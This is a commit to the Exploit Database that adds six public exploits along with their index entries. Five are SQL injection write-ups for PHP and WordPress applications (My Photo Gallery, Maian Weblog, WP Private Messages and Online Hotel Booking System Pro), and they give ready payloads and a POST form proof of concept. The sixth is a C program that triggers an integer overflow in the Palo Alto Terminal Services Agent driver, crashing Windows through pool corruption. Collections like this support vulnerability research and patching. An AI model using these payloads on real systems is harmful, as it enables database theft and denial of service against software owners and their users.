DB: 2017-01-28

6 new exploits

Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow
My Photo Gallery 1.0 - SQL Injection
Maian Weblog 4.0 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
Online Hotel Booking System Pro 1.2 - SQL Injection
WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection
This commit is contained in:
Offensive Security 2017-01-28 05:01:17 +00:00
parent d0b74905e8
commit 2b017ecadf
7 changed files with 278 additions and 0 deletions

View file

@ -8771,6 +8771,7 @@ id,file,description,date,author,platform,type,port
41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37108,3 +37109,8 @@ id,file,description,date,author,platform,type,port
41170,platforms/hardware/webapps/41170.txt,"TM RG4332 Wireless Router - Arbitrary File Disclosure",2017-01-26,"Saeid Atabaki",hardware,webapps,0
41172,platforms/php/webapps/41172.txt,"PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting",2017-01-26,"Manish Tanwar",php,webapps,0
41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0
41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

30
platforms/php/webapps/41177.txt Executable file
View file

@ -0,0 +1,30 @@
Introduction
Exploit Title: My Photo Gallery SQL Injection
Date: 27.01.2017
Vendor Homepage: http://software.friendsinwar.com/
Software Link: http://software.friendsinwar.com/news.php?readmore=40
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
My Photo Gallery is a free is a user-friendly picture gallery script.
Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.
Type of vulnerability:
An SQL Injection vulnerability in My Photo Gallery allows attackers to read
arbitrary administrator data from the database.
Vulnerable Url:
http://locahost/my_photo_gallery/image.php?imgid=[payload]
Vulnerable parameter : imgid
Mehod : GET
Payload:
imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--

26
platforms/php/webapps/41178.txt Executable file
View file

@ -0,0 +1,26 @@
Introduction
Exploit Title: Maian Weblog SQL Injection
Date: 27.01.2017
Vendor Homepage: http://www.maianweblog.com/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Simple blog system for your website, Easily add/edit or delete blogs, Allow visitor comments for individual blogs, Optional e-mail notification for webmaster if comments are posted, Edit or delete visitor comments, BB Code, Calendar so visitors can view past archives, Support for multi language files, Show latest blogs/comments on blog page, Uses the Savant template engine.
Type of vulnerability:
An SQL Injection vulnerability in Maian Weblog allows attackers to read
arbitrary data from the database.
Vulnerable Url:
http://locahost/weblog/blog/2[payload]/second-blog.html
Mehod : GET
Simple Payload:
blog/2' AND (SELECT 2995 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(2995=2995,1))),0x717a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AUvx'='AUvx/q-blog.html

38
platforms/php/webapps/41180.txt Executable file
View file

@ -0,0 +1,38 @@
# Exploit Title: WP Private Messages 1.0.1 Plugin WordPress Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
# Software Link: https://wordpress.org/plugins/wp-email-users/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.3.1
# Tested on: Ubuntu 14.04
1 - Description:
Type user access: is accessible for any registered user
$_REQUEST[edit] is escaped wrong. Attack with Sql Injection
http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wordpress-sql-injection/
2 - Proof of Concept:
1 Login as regular user (created using wp-login.php?action=register):
2 Using:
<form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
<input type="text" name="action" value="weu_my_action">
<input type="text" name="filetitle" value="0 UNION SELECT
CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
<input type="text" name="temp_sel_key" value="select_temp">
<input type="submit" name="">
</form>
3 - Timeline:
- 12/01/2016 Discovered
- 13/12/2016 Vendor not finded

19
platforms/php/webapps/41181.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Online Hotel Booking System Pro v1.2 - SQL Injection
# Google Dork: N/A
# Date: 27.01.2017
# Vendor Homepage: http://www.bestsoftinc.com/
# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro/4606514
# Demo: http://envato.bestsoftinc.net/hotel-booking-pro/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/roomtype-details.php?tid=[SQL]
# E.t.c
# # # # #

18
platforms/php/webapps/41182.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Online Hotel Booking System Pro v1.0 (WordPress Plugin) - SQL Injection
# Google Dork: N/A
# Date: 27.01.2017
# Vendor Homepage: http://www.bestsoftinc.com/
# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro-wordpress-plugin/9338914
# Demo: http://envato.bestsoftinc.net/wp-hotel-pro/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PLUGIN_PATH]/front/roomtype-details.php?tid=[SQL]
# E.t.c
# # # # #

141
platforms/windows/local/41176.c Executable file
View file

@ -0,0 +1,141 @@
/*
Exploit Title - Palo Alto Networks Terminal Services Agent Integer Overflow
Date - 26th January 2017
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.paloaltonetworks.com/
Tested Version - 7.0.3-13
Driver Version - 6.0.7.0 - panta.sys
Tested on OS - 32bit Windows 7 SP1
CVE ID - CVE-2017-5329
Vendor fix url - https://securityadvisories.paloaltonetworks.com/
https://securityadvisories.paloaltonetworks.com/Home/Detail/71
Fixed Version - 7.0.7 and later
Fixed driver ver - 6.0.8.0
Disassembly
-----------
.text:9A26F0BD loc_9A26F0BD:
.text:9A26F0BD mov ecx, DeviceObject
.text:9A26F0C3 mov dword ptr [ecx+1ACh], 0
.text:9A26F0CD mov edx, DeviceObject
.text:9A26F0D3 mov eax, [edx+1B8h] ; eax points to our inputted buffer
.text:9A26F0D9 mov ecx, [eax+14h] ; Takes size to allocate from our inputted buffer 0x04924925
.text:9A26F0DC imul ecx, 38h ; 0x38 * 0x04924925 = 0x100000018. Wraps round becoming size to allocate 0x18 (Integer Overflow)
.text:9A26F0DF mov [ebp+NumberOfBytes], ecx ; Copy ecx value 0x18 onto stack
.text:9A26F0E2 push 44415450h ; Tag (PTAD string used)
.text:9A26F0E7 mov edx, [ebp+NumberOfBytes] ; Copy size 0x18 to edx
.text:9A26F0EA push edx ; NumberOfBytes
.text:9A26F0EB push 0 ; PoolType
.text:9A26F0ED call ds:ExAllocatePoolWithTag ; If returned null (eax) exits with error cleanly else takes crash path
.text:9A26F0F3 mov ecx, DeviceObject
.text:9A26F0F9 mov [ecx+1B0h], eax
.text:9A26F0FF mov edx, DeviceObject
.text:9A26F105 cmp dword ptr [edx+1B0h], 0 ; Checks return value. If not null then jumps to our crash path
.text:9A26F10C jnz short loc_9A26F13C ; Exits with error cleanly if incorrect size value but not crashable value
.text:9A26F13C
.text:9A26F13C loc_9A26F13C:
.text:9A26F13C mov ecx, [ebp+NumberOfBytes]
.text:9A26F13F push ecx ; 0x18 our allocated pool memory
.text:9A26F140 push 0 ; int, sets allocated memory to 0x00
.text:9A26F142 mov edx, DeviceObject
.text:9A26F148 mov eax, [edx+1B0h]
.text:9A26F14E push eax ; Pointer to our allocated buffer
.text:9A26F14F call memset
.text:9A26F154 add esp, 0Ch
.text:9A26F157 mov [ebp+var_4], 0 ; Null out ebp-4
.text:9A26F15E jmp short loc_9A26F169
.text:9A26F160 loc_9A26F160:
.text:9A26F160 mov ecx, [ebp+var_4]
.text:9A26F163 add ecx, 1 ; Increment counter
.text:9A26F166 mov [ebp+var_4], ecx ; Store counter value
.text:9A26F169 loc_9A26F169:
.text:9A26F169 mov edx, DeviceObject
.text:9A26F16F mov eax, [edx+1B8h] ; eax points to our inputted buffer
.text:9A26F175 mov ecx, [ebp+var_4] ; Loop counter number
.text:9A26F178 cmp ecx, [eax+14h] ; Compares our inputted buffer size 0x04924925. Here our
; size is not using the wrapped value so loops till BSOD
.text:9A26F17B jnb short loc_9A26F19A
.text:9A26F17D mov edx, [ebp+var_4] ; Counter value
.text:9A26F180 imul edx, 38h
.text:9A26F183 mov eax, DeviceObject
.text:9A26F188 mov ecx, [eax+1B0h] ; Pointer to allocated pool copied to ecx
.text:9A26F18E lea edx, [ecx+edx+30h] ; pointer+size(0x38*edx)+0x30
.text:9A26F192 push edx
.text:9A26F193 call sub_9A26C000 ; Starts overwriting other pool allocations !!!
.text:9A26F198 jmp short loc_9A26F160
.text:9A26C000 sub_9A26C000 proc near
.text:9A26C000
.text:9A26C000
.text:9A26C000 arg_0 = dword ptr 8
.text:9A26C000
.text:9A26C000 push ebp
.text:9A26C001 mov ebp, esp
.text:9A26C003 mov eax, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to eax
.text:9A26C006 mov ecx, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to ecx
.text:9A26C009 mov [eax+4], ecx ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30+4
.text:9A26C00C mov edx, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to edx
.text:9A26C00F mov eax, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to eax
.text:9A26C012 mov [edx], eax ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30
.text:9A26C014 pop ebp
.text:9A26C015 retn 4
.text:9A26C015 sub_9A26C000 endp
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 44
int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
unsigned char buffer[BUFSIZE];
memset(buffer, 0x41, BUFSIZE);
printf("\n[i] Size of total input buffer %d bytes", BUFSIZE);
*(DWORD*)(buffer + 20) = 0x04924925;
sprintf(devhandle, "\\\\.\\%s", "panta");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Failed to open device %s\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to continue . . .");
getch();
DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
printf("\n");
CloseHandle(hDevice);
return 0;
}